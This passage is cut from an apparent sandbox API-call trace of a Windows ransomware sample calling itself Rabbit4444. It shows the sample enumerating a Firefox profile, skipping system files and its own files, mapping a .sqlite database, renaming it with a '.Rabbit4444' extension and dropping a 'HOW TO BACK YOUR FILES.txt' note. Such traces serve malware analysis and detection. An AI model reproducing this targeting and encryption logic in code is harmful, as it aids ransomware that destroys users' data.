lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb" [0051.935] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\" [0051.935] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.BFC0E91B00AE8A0620D3" [0051.935] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0051.942] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0051.944] FlushFileBuffers (hFile=0x27c) returned 1 [0051.945] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.945] CloseHandle (hObject=0x27c) returned 1 [0051.946] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb") returned 115 [0051.946] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.946] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ea601c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xf722f14, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe848d71a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0051.946] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.946] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.946] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0051.946] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.946] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ea601c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xf722f14, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe848d71a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.946] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.946] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.946] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0051.946] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.946] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.946] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe848d71a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe848d71a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe848d71a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.946] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.946] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.946] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x421d9eea, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x421d9eea, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x421d9eea, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="818200132aebmoouht.files", cAlternateFileName="818200~1.FIL")) returned 1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="Rabbit4444.exe") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2=".") returned 1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="..") returned 1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="windows") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="bootmgr") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="pagefile.sys") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="boot") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="ids.txt") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="NTUSER.DAT") returned -1 [0051.947] lstrcpyW (in: lpString1=0x130ec20, lpString2="818200132aebmoouht.files" | out: lpString1="818200132aebmoouht.files") returned="818200132aebmoouht.files" [0051.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1171a0 [0051.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11a) returned 0x10c928 [0051.947] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1171a8 | out: ListHead=0xf68b0, ListEntry=0x1171a8) returned 0xea710 [0051.947] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ea7396, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea7396, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x971d956, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Rabbit4444.exe") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2=".") returned 1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="..") returned 1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="windows") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="bootmgr") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="pagefile.sys") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="boot") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ids.txt") returned -1 [0051.947] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="NTUSER.DAT") returned -1 [0051.947] lstrcpyW (in: lpString1=0x130ec20, lpString2="818200132aebmoouht.sqlite" | out: lpString1="818200132aebmoouht.sqlite") returned="818200132aebmoouht.sqlite" [0051.947] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", dwFileAttributes=0x0) returned 1 [0051.948] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0051.948] lstrlenW (lpString="Rabbit4444") returned 10 [0051.948] lstrcmpiW (lpString1="uht.sqlite", lpString2="Rabbit4444") returned 1 [0051.948] lstrlenW (lpString=".dll") returned 4 [0051.948] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0051.948] lstrlenW (lpString=".lnk") returned 4 [0051.948] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0051.948] lstrlenW (lpString=".ini") returned 4 [0051.948] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0051.948] lstrlenW (lpString=".sys") returned 4 [0051.948] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0051.948] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.948] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.948] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14325888905) returned 1 [0051.948] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=122880) returned 1 [0051.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0051.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0051.948] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1e300, lpName=0x0) returned 0x298 [0051.949] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e300) returned 0x70000 [0051.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10ca50 [0051.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0051.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10ca50 | out: hHeap=0xe0000) returned 1 [0051.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0051.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x119df0 [0051.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0051.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0051.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0051.956] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14326650038) returned 1 [0051.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0051.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0051.956] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.957] CloseHandle (hObject=0x298) returned 1 [0051.957] CloseHandle (hObject=0x278) returned 1 [0051.957] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.Rabbit4444") returned 152 [0051.957] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0051.958] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ea7396, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea7396, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x971d956, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 0 [0051.958] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0051.958] lstrcpyW (in: lpString1=0x130ec20, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0051.958] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0051.958] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0051.959] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.959] CloseHandle (hObject=0x278) returned 1 [0051.960] CloseHandle (hObject=0x27c) returned 1 [0051.960] GetCurrentThreadId () returned 0xd98 [0051.960] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1171a8 [0051.960] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0051.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1171a0 | out: hHeap=0xe0000) returned 1 [0051.960] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0051.960] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\" [0051.960] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.BFC0E91B00AE8A0620D3" [0051.960] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0051.961] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0051.964] FlushFileBuffers (hFile=0x27c) returned 1 [0051.964] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.964] CloseHandle (hObject=0x27c) returned 1 [0051.965] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned 140 [0051.965] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.965] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x421d9eea, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x421d9eea, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe84b39cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0051.965] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.965] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.965] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0051.965] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.965] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x421d9eea, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x421d9eea, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe84b39cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.965] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.965] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.965] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0051.966] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.966] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.966] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe84b39cb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe84b39cb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe84b39cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.966] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.966] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.966] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe84b39cb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe84b39cb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe84b39cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.966] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0051.966] lstrcpyW (in: lpString1=0x130ec52, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.966] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0051.967] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0051.967] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0051.967] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.967] CloseHandle (hObject=0x278) returned 1 [0051.967] CloseHandle (hObject=0x27c) returned 1 [0051.967] GetCurrentThreadId () returned 0xd98 [0051.967] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0051.967] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome" [0051.967] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116a00 | out: hHeap=0xe0000) returned 1 [0051.967] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0051.967] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome" [0051.967] lstrcatW (in: 